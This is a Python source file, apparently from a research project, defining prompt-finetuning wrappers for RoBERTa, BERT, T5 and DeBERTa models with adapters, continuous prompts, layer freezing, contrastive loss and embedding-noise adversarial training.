from model_adaptation import RobertaAdaModel, BertAdaModel
import os
logger = logging.getLogger(__name__)
def generate_noise(embed, mask, epsilon=1e-5):
noise = embed.data.new(embed.size()).normal_(0, 1) * epsilon
noise.detach()
noise.requires_grad_()
return noise
def norm_grad(grad, eff_grad=None, sentence_level=False, norm_p='max', epsilon=1e-5):
if norm_p == 'l2':
if sentence_level:
direction = grad / (torch.norm(grad, dim=(-2, -1), keepdim=True) + epsilon)
else:
direction = grad / (torch.norm(grad, dim=-1, keepdim=True) + epsilon)
elif norm_p == 'l1':
direction = grad.sign()
else:
if sentence_level:
direction = grad / (grad.abs().max((-2, -1), keepdim=True)[0] + epsilon)
else:
direction = grad / (grad.abs().max(-1, keepdim=True)[0] + epsilon)
eff_direction = eff_grad / (grad.abs().max(-1, keepdim=True)[0] + epsilon)
return direction, eff_direction
def resize_token_type_embeddings(model, new_num_types: int, random_segment: bool):
"""
Resize the segment (token type) embeddings for BERT
"""
if hasattr(model, 'bert'):
old_token_type_embeddings = model.bert.embeddings.token_type_embeddings
else:
raise NotImplementedError
new_token_type_embeddings = nn.Embedding(new_num_types, old_token_type_embeddings.weight.size(1))
if not random_segment:
new_token_type_embeddings.weight.data[:old_token_type_embeddings.weight.size(0)] = old_token_type_embeddings.weight.data
model.config.type_vocab_size = new_num_types
if hasattr(model, 'bert'):
model.bert.embeddings.token_type_embeddings = new_token_type_embeddings
else:
raise NotImplementedError
class LMForPromptFinetuning(BertPreTrainedModel):
def __init__(self, config, model_args, data_args):
super().__init__(config)
self.model_args = model_args
self.data_args = data_args
self.config = config
# Create config
num_labels = num_labels_mapping[data_args.task_name]
self.num_labels = num_labels
config.adapter_dim = model_args.adapter_dim
config.adapter_alpha = model_args.adapter_alpha
config.adapter_choice = model_args.adapter_choice
self.config = config
if 'prompt' in model_args.few_shot_type:
if config.model_type == 'roberta':
model_fn = RobertaForPromptFinetuning
elif config.model_type == 'bert':
model_fn = BertForPromptFinetuning
elif config.model_type == 'deberta':
model_fn = DebertaForPromptFinetuning
elif config.model_type == 'deberta-v2':
model_fn = Debertav2ForPromptFinetuning
elif config.model_type == 't5':
self.lm_model = T5ForPromptFinetuning(config)
else:
raise NotImplementedError
else:
raise NotImplementedError
if config.model_type == 't5':
self.lm_model.T5 = self.lm_model.T5.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
else:
self.lm_model = model_fn.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
# Pass dataset and argument information to the model
if data_args.prompt:
self.lm_model.label_word_list = torch.tensor(data_args.label_word_list).long().cuda()
if output_modes_mapping[data_args.task_name] == 'regression':
# lower / upper bounds
self.lm_model.lb, self.lm_model.ub = bound_mapping[data_args.task_name]
self.lm_model.model_args = model_args
self.lm_model.data_args = data_args
self.hidden_size = config.hidden_size
if self.data_args.continuous_prompt == 1:
self.prompt_embeddings = torch.nn.Embedding(self.data_args.prompt_length, self.hidden_size)
else:
self.prompt_embeddings = None
self.prompt_embeddings = torch.nn.Embedding(self.data_args.prompt_length, self.hidden_size)
if self.model_args.adapter_choice != 'none':
self.init_adapter(std=self.model_args.adapter_init_std)
self.prompt_encoder = None
if self.data_args.continuous_prompt == 1:
self.init_embedding()
def init_adapter(self, std):
with torch.no_grad():
for name, param in self.lm_model.named_parameters():
init_value = 0
if 'adapter_proj' in name:
if self.model_args.adapter_choice == 'simple':
init_value = torch.eye(param.size(0))
if std > 0:
init_value += torch.normal(0, std, size=param.size())
param.copy_(init_value)
def freeze_lm(self):
for name, param in self.lm_model.named_parameters():
param.requires_grad = False
def freeze_lm_encoder(self):
for name, param in self.lm_model.named_parameters():
if 'lm_head' in name or ('cls' in name):
print(name)
continue
param.requires_grad = False
def freeze_lm_finetune_bias(self):
for name, param in self.lm_model.named_parameters():
if "bias" in name:
print(name)
continue
param.requires_grad = False
def freeze_lm_component(self, component):
if 'attention' in component:
for name, param in self.lm_model.named_parameters():
if 'attention' in name:
if 'output' in component:
if 'output' in name:
continue
else:
continue
param.requires_grad = False
self.unfreeze_classification_head()
elif 'feedforward' in component:
for name, param in self.lm_model.named_parameters():
if 'dense' in name and 'attention' not in name:
if 'output' in component:
if 'output' in name:
continue
else:
if 'intermediate' in component:
if 'intermediate' in name:
continue
param.requires_grad = False
self.unfreeze_classification_head()
elif component == 'adapter':
for name, param in self.lm_model.named_parameters():
if 'adapter' in name:
continue
param.requires_grad = False
self.unfreeze_classification_head()
elif 'embedding' in component:
for name, param in self.lm_model.named_parameters():
if 'embedding' in name:
continue
param.requires_grad = False
self.unfreeze_classification_head()
elif 'bias' in component:
for name, param in self.lm_model.named_parameters():
if 'bias' in name:
continue
param.requires_grad = False
self.unfreeze_classification_head()
elif 'head' in component:
for name, param in self.lm_model.named_parameters():
param.requires_grad = False
self.unfreeze_classification_head()
elif "prompt_emb" in component:
for name, param in self.lm_model.named_parameters():
if 'prompt_emb' in name:
continue
param.requires_grad = False
def unfreeze_classification_head(self):
for name, param in self.lm_model.named_parameters():
if 'lm_head' in name or ('cls' in name) or ('classifier' in name):
param.requires_grad = True
def freeeze_lm_k_layers(self, k):
keep_layers = []
update_parameters = []
for i in range(k):
keep_layers.append('layer.'+str(23-i))
for name, param in self.lm_model.named_parameters():
update = False
for layer_num in keep_layers:
if layer_num in name:
if 'dense' in name and 'attention' not in name:
if 'output' in name:
print(name)
update_parameters.append(name)
update = True
if not update:
param.requires_grad = False
self.unfreeze_classification_head()
def unfreeze_lm(self):
for param in self.lm_model.parameters():
param.requires_grad = True
def init_embedding(self):
rand_id = torch.randint(100, self.config.vocab_size, (self.data_args.prompt_length,)).long()
rand_emb = self.lm_model.embed_encode(rand_id)
self.prompt_embeddings = self.prompt_embeddings.from_pretrained(rand_emb, freeze=False)
def get_adv_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None):
logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
embed = self.forward(*input_args)
noise = generate_noise(embed, attention_mask)
for step in range(0, self.K):
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, _ = self.forward(*vat_args)
adv_loss = stable_kl(adv_logits, logits.detach(), reduce=False)
try:
delta_grad, = torch.autograd.grad(adv_loss, noise, only_inputs=True, retain_graph=False)
except:
import pdb
pdb.set_trace()
norm = delta_grad.norm()
if (torch.isnan(norm) or torch.isinf(norm)):
return 0
eff_delta_grad = delta_grad * self.step_size
delta_grad, eff_noise = norm_grad(delta_grad, eff_grad=eff_delta_grad)
noise = noise + delta_grad * self.step_size
# noise, eff_noise = self._norm_grad(delta_grad, eff_grad=eff_delta_grad, sentence_level=self.norm_level)
noise = noise.detach()
noise.requires_grad_()
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, sequence_mask_output = self.forward(*vat_args)
# ori_args = model(*ori_args)
# aug_args = [input_ids, token_type_ids, attention_mask, premise_mask, hyp_mask, task_id, 2, (embed + native_noise).detach()]
adv_loss = self.adv_lc(adv_logits, logits, reduction='none')
return adv_loss
def embed_encode(self, input_ids):
embedding_output = self.lm_model.embeddings.word_embeddings(input_ids)
return embedding_output
def encode(self, input_ids=None, attention_mask=None, mask_pos=None, inputs_embeds=None, return_full_softmax=False):
# import pdb
# pdb.set_trace()
batch_size = input_ids.size(0)
if mask_pos is not None:
mask_pos = mask_pos.squeeze()
# Encode everything
if inputs_embeds is None:
outputs = self.lm_model(
input_ids,
attention_mask=attention_mask
)
else:
outputs = self.lm_model(
None,
attention_mask=attention_mask,
inputs_embeds=inputs_embeds
)
# Get <mask> token representation
sequence_output, pooled_output = outputs[:2]
sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]
# Logits over vocabulary tokens
prediction_mask_scores = self.lm_head(sequence_mask_output)
# sequence_mask_output = self.lm_head.dense(sequence_mask_output)
# Exit early and only return mask logits.
if return_full_softmax:
return prediction_mask_scores
# Return logits for each label
logits = []
for label_id in range(len(self.label_word_list)):
logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
logits = torch.cat(logits, -1)
# Regression task
if self.config.num_labels == 1:
logsoftmax = nn.LogSoftmax(-1)
logits = logsoftmax(logits) # Log prob of right polarity
if self.model_args.hybrid == 1:
cls_logits = self.classifier(sequence_output)
return (logits, cls_logits), sequence_mask_output
return logits, sequence_mask_output
def generate_continuous_prompt_inputs(self, input_ids, block_flag):
inputs_embeds = self.lm_model.embed_encode(input_ids)
bz = inputs_embeds.shape[0]
try:
replace_embeds = self.prompt_embeddings(
torch.LongTensor(list(range(self.data_args.prompt_length))).to(inputs_embeds.device))
except:
import pdb
pdb.set_trace()
replace_embeds = self.prompt_embeddings(
torch.LongTensor(list(range(self.data_args.prompt_length))))
replace_embeds = replace_embeds.unsqueeze(0) # [batch_size, prompt_length, embed_size]
if self.prompt_encoder is not None:
replace_embeds = self.prompt_encoder(replace_embeds)
blocked_indices = (block_flag == 1).nonzero(as_tuple=False).reshape((bz, self.data_args.prompt_length, 2))[:, :, 1]
for bidx in range(bz):
for i in range(blocked_indices.shape[1]):
inputs_embeds[bidx, blocked_indices[bidx, i], :] = replace_embeds[:, i, :].squeeze()
return inputs_embeds
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
mask_pos=None,
labels=None,
inputs_embeds=None,
fwd_type=0,
block_flag=None,
*args,
**kwargs
):
if 't5' in self.config.model_type:
logits, sequence_mask_output = self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, labels=labels)
else:
if fwd_type == 2:
assert inputs_embeds is not None
if token_type_ids is not None:
return self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, mask_pos=mask_pos,
inputs_embeds=inputs_embeds)
else:
return self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, mask_pos=mask_pos,
inputs_embeds=inputs_embeds)
elif fwd_type == 1:
return self.lm_model.embed_encode(input_ids)
if self.data_args.continuous_prompt == 1 and block_flag is not None and block_flag[0] is not None:
inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)
if fwd_type == 3:
if token_type_ids is not None:
prediction_mask_scores = self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, mask_pos=mask_pos,
inputs_embeds=inputs_embeds, return_full_softmax=True)
else:
prediction_mask_scores = self.lm_model.encode(input_ids, attention_mask, mask_pos, inputs_embeds, return_full_softmax=True)
if labels is not None:
return torch.zeros(1, out=prediction_mask_scores.new()), prediction_mask_scores
return prediction_mask_scores
if token_type_ids is not None:
logits, sequence_mask_output = self.lm_model.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, mask_pos=mask_pos,
inputs_embeds=inputs_embeds)
else:
logits, sequence_mask_output = self.lm_model.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
if fwd_type == 4:
return logits, sequence_mask_output
loss = None
if labels is not None:
if self.num_labels == 1:
# Regression task
loss_fct = nn.KLDivLoss(log_target=True)
labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb),
(labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
loss = loss_fct(logits.view(-1, 2), labels)
else:
if labels.shape == logits.shape:
loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
labels, reduction='batchmean')
else:
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))
output = (logits,)
if self.num_labels == 1:
# Regression output
output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
return ((loss,) + output) if loss is not None else output
def from_pretrained(self, pretrained_model_name_or_path, *model_args, **kwargs):
self.lm_model = self.lm_model.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)
if self.data_args.prompt:
self.lm_model.label_word_list = torch.tensor(self.data_args.label_word_list).long().cuda()
if output_modes_mapping[self.data_args.task_name] == 'regression':
# lower / upper bounds
self.lm_model.lb, self.lm_model.ub = bound_mapping[self.data_args.task_name]
self.lm_model.model_args = self.model_args
self.lm_model.data_args = self.data_args
return self
def load_model(self, checkpoint):
if os.path.isfile(checkpoint):
model_state_dict = torch.load(checkpoint)
self.load_state_dict(model_state_dict, strict=False)
class BertForSequenceClassification(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.config = config
self.bert = BertModel(config)
classifier_dropout = (
config.classifier_dropout if config.classifier_dropout is not None else config.hidden_dropout_prob
)
self.dropout = nn.Dropout(classifier_dropout)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
class T5ForPromptFinetuning(T5ForConditionalGeneration):
def __init__(self, config):
super().__init__(config)
self.T5 = T5ForConditionalGeneration(config)
# These attributes should be assigned once the model is initialized
self.model_args = None
self.data_args = None
self.label_word_list = None
# For regression
self.lb = None
self.ub = None
# For label search.
self.return_full_softmax = None
def get_labels(self, input_ids):
batch_size = input_ids.size(0)
# new_labels = torch.tensor([3,32099,1] * batch_size).to(labels.device)
# prefix = torch.tensor([32099] * batch_size).to(labels.device)
# ending = torch.tensor([1] * batch_size).to(labels.device)
# prefix_labels = torch.cat((start.unsqueeze(1), prefix.unsqueeze(1)), 1)
# prefix_labels = torch.cat(( prefix_labels, labels.unsqueeze(1)), 1)
new_labels = torch.tensor([3, 32099,1]).to(input_ids.device).unsqueeze(0).repeat(batch_size, 1)
return new_labels
def encode(self, input_ids=None, attention_mask=None, token_type_ids=None, mask_pos=None, inputs_embeds=None,
return_full_softmax=False, labels=None):
if labels is not None:
t5_labels = self.get_labels(input_ids)
outputs = self.T5(input_ids=input_ids, attention_mask=attention_mask, labels=t5_labels)
prediction_mask_scores = outputs.logits[:, 2, :]
logits = []
for label_id in range(len(self.label_word_list)):
logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
logits = torch.cat(logits, -1)
return logits, prediction_mask_scores
class BertForPromptFinetuning(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
if config.adapter_choice != 'none':
self.bert = BertAdaModel(config)
else:
self.bert = BertModel(config)
self.cls = BertOnlyMLMHead(config)
self.init_weights()
# These attributes should be assigned once the model is initialized
self.model_args = None
self.data_args = None
self.label_word_list = None
# For regression
self.lb = None
self.ub = None
# For label search.
self.return_full_softmax = None
def embed_encode(self, input_ids):
embedding_output = self.bert.embeddings.word_embeddings(input_ids)
return embedding_output
def encode(self, input_ids=None, attention_mask=None, token_type_ids=None, mask_pos=None, inputs_embeds=None, return_full_softmax=False):
batch_size = input_ids.size(0)
if mask_pos is not None:
mask_pos = mask_pos.squeeze()
# Encode everything
if inputs_embeds is None:
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids
)
else:
outputs = self.bert(
None,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds
)
# Get <mask> token representation
sequence_output, pooled_output = outputs[:2]
sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]
# Logits over vocabulary tokens
prediction_mask_scores = self.cls(sequence_mask_output)
#sequence_mask_output = self.lm_head.dense(sequence_mask_output)
# Exit early and only return mask logits.
if return_full_softmax:
return prediction_mask_scores
# Return logits for each label
logits = []
for label_id in range(len(self.label_word_list)):
logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
logits = torch.cat(logits, -1)
# Regression task
if self.config.num_labels == 1:
logsoftmax = nn.LogSoftmax(-1)
logits = logsoftmax(logits) # Log prob of right polarity
if self.model_args.hybrid == 1:
cls_logits = self.classifier(sequence_output)
return (logits, cls_logits), sequence_mask_output
return logits, sequence_mask_output
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
mask_pos=None,
labels=None,
inputs_embeds=None,
fwd_type=0,
block_flag=None
):
if fwd_type == 2:
assert inputs_embeds is not None
return self.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, mask_pos=mask_pos, inputs_embeds=inputs_embeds)
elif fwd_type == 1:
return self.embed_encode(input_ids)
if self.data_args.continuous_prompt == 1 and block_flag is not None:
inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)
logits, sequence_mask_output = self.encode(input_ids, attention_mask, token_type_ids, mask_pos, inputs_embeds)
if self.model_args.hybrid == 1:
logits = logits[0]
cls_logits = logits[1]
loss = None
if labels is not None:
if self.num_labels == 1:
# Regression task
loss_fct = nn.KLDivLoss(log_target=True)
labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb), (labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
loss = loss_fct(logits.view(-1, 2), labels)
else:
if labels.shape == logits.shape:
loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
labels, reduction='batchmean')
else:
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))
output = (logits,)
if self.num_labels == 1:
# Regression output
output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
return ((loss,) + output) if loss is not None else output
class RobertaForPromptFinetuning(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
if config.adapter_choice != 'none':
self.roberta = RobertaAdaModel(config)
else:
self.roberta = RobertaModel(config)
# self.classifier = RobertaClassificationHead(config)
self.lm_head = RobertaLMHead(config)
self.hidden_size = config.hidden_size
# self.map = nn.Linear(config.hidden_size, config.hidden_size)
# These attributes should be assigned once the model is initialized
self.model_args = None
self.data_args = None
self.label_word_list = None
self.K = 1
self.step_size=1e-5
self.adv_lc = SymKlCriterion()
self.contra_lc = ContrastiveLoss()
#self.step_size=config.step_size
# For regression
self.lb = None
self.ub = None
self.tokenizer = None
self.prompt_embeddings = None
self.lstm_head = None
self.mlp_head = None
self.mlp = None
# For auto label search.
self.return_full_softmax = None
#self.init_weights()
# else:
# raise ValueError('unknown prompt_encoder_type.')
def get_constrast_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None,
block_flag=None):
self.cos = nn.CosineSimilarity(dim=-1)
if self.data_args.continuous_prompt == 1:
inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)
_, sequence_mask_output_1 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
_, sequence_mask_output_2 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
sequence_mask_output_1= self.lm_head.dense(sequence_mask_output_1)
sequence_mask_output_2 = self.lm_head.dense(sequence_mask_output_2)
# input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
# embed = self.forward(*input_args)
#
# vat_args = [input_ids, attention_mask, mask_pos, labels, embed, 2]
#
# adv_logits, outputs = self.forward(*vat_args)
#
# logit_mask = F.softmax(logits, dim=-1)[torch.arange(adv_logits.size(0)), labels] > 0.7
#
# outputs = outputs[logit_mask]
# seq_outputs = sequence_mask_output[logit_mask]
# new_label = labels[logit_mask]
# #
# #
# rand_perm = torch.randperm(outputs.size(0))
# rand_outputs = outputs[rand_perm, :]
# rand_label = new_label[rand_perm]
# pair_label = (new_label == rand_label).long()
#
# seq_outputs = self.map(seq_outputs)
# rand_outputs = self.map(rand_outputs)
pair_labels = (labels.unsqueeze(1) == labels.unsqueeze(0)).float()
contra_loss = self.contra_lc(sequence_mask_output_1.unsqueeze(1), sequence_mask_output_2.unsqueeze(0), pair_labels)
if torch.isnan(contra_loss):
return 0
return contra_loss
def get_adv_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None):
logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
embed = self.forward(*input_args)
noise = generate_noise(embed, attention_mask)
for step in range(0, self.K):
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, _ = self.forward(*vat_args)
adv_loss = stable_kl(adv_logits, logits.detach(), reduce=False)
try:
delta_grad, = torch.autograd.grad(adv_loss, noise, only_inputs=True, retain_graph=False)
except:
import pdb
pdb.set_trace()
norm = delta_grad.norm()
if (torch.isnan(norm) or torch.isinf(norm)):
return 0
eff_delta_grad = delta_grad * self.step_size
delta_grad, eff_noise = norm_grad(delta_grad, eff_grad=eff_delta_grad)
noise = noise + delta_grad * self.step_size
# noise, eff_noise = self._norm_grad(delta_grad, eff_grad=eff_delta_grad, sentence_level=self.norm_level)
noise = noise.detach()
noise.requires_grad_()
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, sequence_mask_output = self.forward(*vat_args)
# ori_args = model(*ori_args)
# aug_args = [input_ids, token_type_ids, attention_mask, premise_mask, hyp_mask, task_id, 2, (embed + native_noise).detach()]
adv_loss = self.adv_lc(adv_logits, logits, reduction='none')
return adv_loss
def embed_encode(self, input_ids):
embedding_output = self.roberta.embeddings.word_embeddings(input_ids)
return embedding_output
def encode(self, input_ids=None, attention_mask=None, mask_pos=None, inputs_embeds=None, return_full_softmax=False):
batch_size = input_ids.size(0)
if mask_pos is not None:
mask_pos = mask_pos.squeeze()
# Encode everything
if inputs_embeds is None:
outputs = self.roberta(
input_ids,
attention_mask=attention_mask
)
else:
outputs = self.roberta(
None,
attention_mask=attention_mask,
inputs_embeds=inputs_embeds
)
# Get <mask> token representation
sequence_output, pooled_output = outputs[:2]
sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]
# Logits over vocabulary tokens
prediction_mask_scores = self.lm_head(sequence_mask_output)
#sequence_mask_output = self.lm_head.dense(sequence_mask_output)
# Exit early and only return mask logits.
if return_full_softmax:
return prediction_mask_scores
# Return logits for each label
logits = []
for label_id in range(len(self.label_word_list)):
logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
logits = torch.cat(logits, -1)
# Regression task
if self.config.num_labels == 1:
logsoftmax = nn.LogSoftmax(-1)
logits = logsoftmax(logits) # Log prob of right polarity
if self.model_args.hybrid == 1:
cls_logits = self.classifier(sequence_output)
return (logits, cls_logits), sequence_mask_output
return logits, sequence_mask_output
def generate_continuous_prompt_inputs(self, input_ids, block_flag):
inputs_embeds = self.embed_encode(input_ids)
bz = inputs_embeds.shape[0]
try:
replace_embeds = self.prompt_embeddings(
torch.LongTensor(list(range(1))).to(inputs_embeds.device))
except:
import pdb
pdb.set_trace()
replace_embeds = self.prompt_embeddings(
torch.LongTensor(list(range(1))))
replace_embeds = replace_embeds.unsqueeze(0) # [batch_size, prompt_length, embed_size]
# if self.model_args.prompt_encoder_type == "lstm":
# replace_embeds = self.lstm_head(replace_embeds)[0] # [batch_size, seq_len, 2 * hidden_dim]
# if self.prompt_length == 1:
# replace_embeds = self.mlp_head(replace_embeds)
# else:
# replace_embeds = self.mlp_head(replace_embeds).squeeze()
# elif self.model_args.prompt_encoder_type == "mlp":
replace_embeds = self.mlp(replace_embeds)
# else:
# raise ValueError("unknown prompt_encoder_type.")
blocked_indices = (block_flag == 1).nonzero(as_tuple=False).reshape((bz, self.model_args.prompt_length, 2))[:, :, 1]
for bidx in range(bz):
for i in range(blocked_indices.shape[1]):
inputs_embeds[bidx, blocked_indices[bidx, i], :] = replace_embeds[i, :]
return inputs_embeds
def forward(
self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None,
fwd_type=0,
block_flag=None
):
if fwd_type == 2:
assert inputs_embeds is not None
return self.encode(input_ids=input_ids, attention_mask=attention_mask, mask_pos=mask_pos, inputs_embeds=inputs_embeds)
elif fwd_type == 1:
return self.embed_encode(input_ids)
if self.data_args.continuous_prompt == 1 and block_flag is not None:
inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)
logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
if self.model_args.hybrid == 1:
logits = logits[0]
cls_logits = logits[1]
loss = None
if labels is not None:
if self.num_labels == 1:
# Regression task
loss_fct = nn.KLDivLoss(log_target=True)
labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb), (labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
loss = loss_fct(logits.view(-1, 2), labels)
else:
if labels.shape == logits.shape:
loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
labels, reduction='batchmean')
else:
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))
output = (logits,)
if self.num_labels == 1:
# Regression output
output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
return ((loss,) + output) if loss is not None else output
class RobertaForSequenceClassification(BertPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"position_ids"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.config = config
if config.adapter_choice != 'none':
self.roberta = RobertaAdaModel(config, add_pooling_layer=False)
else:
self.roberta = RobertaModel(config, add_pooling_layer=False)
#self.roberta = RobertaModel(config, add_pooling_layer=False)
self.classifier = RobertaClassificationHead(config)
self.init_weights()
def freeze_lm_component(self, component):
if 'attention' in component:
for name, param in self.roberta.named_parameters():
if 'attention' in name:
if 'output' in component:
if 'output' in name:
continue
else:
continue
param.requires_grad = False
elif 'feedforward' in component:
for name, param in self.roberta.named_parameters():
if 'dense' in name and 'attention' not in name:
if 'output' in component:
if 'output' in name:
continue
else:
if 'intermediate' in component:
if 'intermediate' in name:
continue
param.requires_grad = False
elif component == 'adapter':
for name, param in self.roberta.named_parameters():
if 'adapter' in name:
continue
param.requires_grad = False
elif 'embedding' in component:
for name, param in self.roberta.named_parameters():
if 'embedding' in name:
continue
# if 'lm_head' in name:
#
# if 'output' in name:
# continue
param.requires_grad = False
elif 'bias' in component:
for name, param in self.roberta.named_parameters():
if 'bias' in name:
continue
# if 'lm_head' in name:
#
# if 'output' in name:
# continue
param.requires_grad = False
elif 'head' in component:
for name, param in self.roberta.named_parameters():
param.requires_grad = False
self.unfreeze_classification_head()
def unfreeze_classification_head(self):
for name, param in self.roberta.named_parameters():
if 'lm_head' in name or ('cls' in name) or ('classifier' in name):
param.requires_grad = True
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.roberta(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
logits = self.classifier(sequence_output)
loss = None
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
#output = (logits,) + outputs[2:]
output = (logits,)
return ((loss,) + output) if loss is not None else output
class DebertaForPromptFinetuning(DebertaPreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"pooler"]
_keys_to_ignore_on_load_missing = [r"position_ids", r"predictions.decoder.bias"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
#self.deberta = DebertaV2Model(config)
self.deberta = DebertaModel(config)
self.cls = DebertaOnlyMLMHead(config)
